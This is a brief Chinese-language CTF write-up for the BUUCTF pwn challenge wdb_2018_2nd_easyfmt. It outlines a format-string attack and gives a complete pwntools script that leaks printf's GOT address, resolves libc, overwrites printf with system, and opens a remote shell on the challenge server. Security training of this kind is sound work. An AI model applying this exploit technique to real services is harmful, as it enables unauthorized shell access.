[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
一个简单的格式化字符串利用问题
- 泄露出got表地址,找到libc基地址
- 寻找system的实际地址
- 将printf_got修改为system的地址
- 写入”/bin/sh"
exploit
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
p = remote('node3.buuoj.cn',25125)
#p = process("./wdb_2018_2nd_easyfmt")
elf = ELF("./wdb_2018_2nd_easyfmt")
printf_got = elf.got["printf"]
payload1 = p32(printf_got) + "%6$s"
p.sendlineafter("repeater?\n",payload1)
p.recv(4)
printf_addr = u32(p.recv(4))
print("printf_addr ---> ",hex(printf_addr))
libc = LibcSearcher("printf", printf_addr)
libcbase = printf_addr - libc.dump("printf")
system = libcbase + libc.dump("system")
payload = fmtstr_payload(6,{printf_got: system})
p.sendline(payload)
p.sendline("/bin/sh\x00")
p.interactive()